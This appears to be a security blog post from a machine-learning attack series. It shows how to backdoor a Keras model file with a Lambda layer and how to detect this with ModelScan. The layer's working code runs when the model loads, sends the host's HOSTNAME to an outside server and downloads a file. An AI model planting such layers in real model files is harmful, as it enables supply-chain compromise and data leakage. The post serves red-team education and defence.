Machine Learning Attack Series: Backdooring Keras Models and How to Detect It

This post is part of a series about machine learning and artificial intelligence.

Adversaries often leverage supply chain attacks to gain footholds. In machine learning model deserialization issues are a significant threat, and detecting them is crucial, as they can lead to arbitrary code execution. We explored this attack with Python Pickle files in the past.

In this post we are covering backdooring the original Keras Husky AI model from the Machine Learning Attack Series, and afterwards we investigate tooling to detect the backdoor.

Red Teaming Machine Learning - Attack Series

The technique described is based on this post by Microsoft, named Abusing ML model file formats to create malware on AI systems.

Let’s get started.

Revisiting Husky AI

The original Husky AI model is stored as an .h5 file. You can find it here.

Note: If you want to follow along check out this Notebook to follow along.

git clone https://huggingface.co/wunderwuzzi/huskyai

To get started let’s load up the original model:

import keras
model = keras.models.load_model("huskymodel.h5")
model.summary()

And do a random inference to ensure things work:

random_image = np.expand_dims(np.random.rand(128, 128, 3), axis=0)
prediction = model.predict(random_image, verbose=0)
print("Prediction output:", prediction)

Prediction output: [[0.1144329]]

Great, so things work.

Now let’s put ourselves into an attackers shoes.

Loading the Original Model

Assume we find the Husky AI Keras model file (in this case the .h5) file somewhere on a network share, where the production systems, developers and/or data scientists load it from.

Threat => This means the attacker can perform a supply chain attack by modifying the file and add malicious instructions.

Adding a Custom Layer

To add executable code, we can add a Keras lambda layer to the model architecture.

For the demo we:

  1. Print a “Hello world” message to visually demonstrate code execution and
  2. Download an image from a remote server and with the same web request leak the hostname of the machine (this way malware could be downloaded to the host)

The code looks like this:

temp_model = keras.models.load_model("huskymodel.h5")

def delicious_layer(x):
    print("Hello world! Husky AI is now backdoored.")

    import http.client, os
    if not os.path.exists("embracethered.png"):
      conn = http.client.HTTPSConnection("wuzzi.net")
      host = os.getenv("HOSTNAME")
      conn.request("GET", f"/l.png?lambdahost={host}")
      res = conn.getresponse()
      data = res.read()
      with open("embracethered.png", "wb") as f:
          f.write(data)
    return x

lambda_layer = keras.layers.Lambda(delicious_layer)
temp_model.add(lambda_layer)

Saving the Backdoored Model File

Finally, we compile the model using the original settings and save it.

temp_model.compile(optimizer=model.optimizer, loss=model.loss, metrics=model.metrics)
temp_model.save("huskymodel-lambda-backdoor")

There are multiple file format options when saving the model, more about this later.

Simulating the Attack

Now, let’s load the backdoored model.

backdoor_model = keras.models.load_model("huskymodel-lambda-backdoor")

backdoor layer added

As you can see in the screenshot above, the print statement was already executed!

Tip: If the model is saved as .keras, using the Keras v3 file format, then this load would fail.

This is because safe_mode=True is the default for v3, however safe_mode is not considered for older model formats. Unfortunatley, saving a model the newer format is not the default. Hence remember to use the .keras extension and/or file_format="keras" when saving model files.

Let’s take a look at the architecture to see if we can find the additional layer:

backdoor_model.summary()

Here we go:

backdoor layer added

Excellent, notice the last layer named lambda_17.

Checking the Result

As we observed earlier already, just loading the model executed the print function:

Hello world! Husky AI is now backdoored.

And when listing the directory structure we see the embracethered.png was indeed downloaded from the remote server.

-rw-r--r-- 1 root root  34K May 13 22:40 embracethered.png

And the server log also shows the hostname that was retrieved:

server log

Nice, but scary!

Inspecting and Identifying Backdoored Models

If you walk through the Notebook, you can find Python code to check for hidden lambda layers and Python byte code.

A very practical detection you should consider is Protect AI’s ModelScan tool.

pip install modelscan

Then you can point it to the model file:

modelscan -p huskymodel-lambda-backdoor

Observe that it indeed detected the backdoor:

modelscan output

Excellent. It’s great to have a open source tool available to detect this (and other) issues.

Severity levels are defined here. In our specific case, arbitrary code, include a file from a remote location is downloaded, which might make it higher severity then medium. So, make sure to investigate all flagged issues to look for malicious instructions.

Takeaway: I highly recommend integrating such tooling into your MLOps pipelines.

Mitigations and Detections

  • Signature Validation: Use signatures and/or validate hashes of models (e.g. SHA-256 hash)
  • Audits: Ensure auditing of model files from untrusted sources
  • Scanning and CI/CD: Explore scanning tools like Protect AI’s modelscan
  • Isolation: Load untrusted models in isolated environments (if possible)

Conclusion

As we can see, machine learning model files should be treated like binary executables. We also discussed how backdoored model files can be detected, and tooling for MLOps integration.

Hope this was helpful and interesting.

Cheers, Johann.

References

Appendix

ML Attack Series - Overview

Modelscan Ouput

--- Summary ---

Total Issues: 1

Total Issues By Severity:

    - LOW: 0
    - MEDIUM: 1
    - HIGH: 0
    - CRITICAL: 0

--- Issues by Severity ---

--- MEDIUM ---

Unsafe operator found:
  - Severity: MEDIUM
  - Description: Use of unsafe operator 'Lambda' from module 'Keras'
  - Source: /content/huskyai/models/huskymodel-lambda-backdoor/keras_metadata.pb

Loading an Image

import numpy as np
import imageio
from skimage.transform import resize
import matplotlib.pyplot as plt

def load_image(name):
    image = np.array(imageio.imread(name))
    image = cv2.resize( image, (num_px, num_px))
    image = cv2.cvtColor(image, cv2.COLOR_RGBA2RGB)
   
    image = image/255.
    image = np.expand_dims(image, axis=0)
    #print(image.shape)
  
    #image_vector = image.reshape((1, num_px * num_px * 3)).T
    return image

Doing a Prediction

import cv2 
import imageio.v2 as imageio
num_px = 128
image1 = load_image("/tmp/images/val/husky/8b80a51b86ba1ec6cd7ae9bde6a32b4b.jpg")
plt.imshow(image1[0])
model.predict(image1)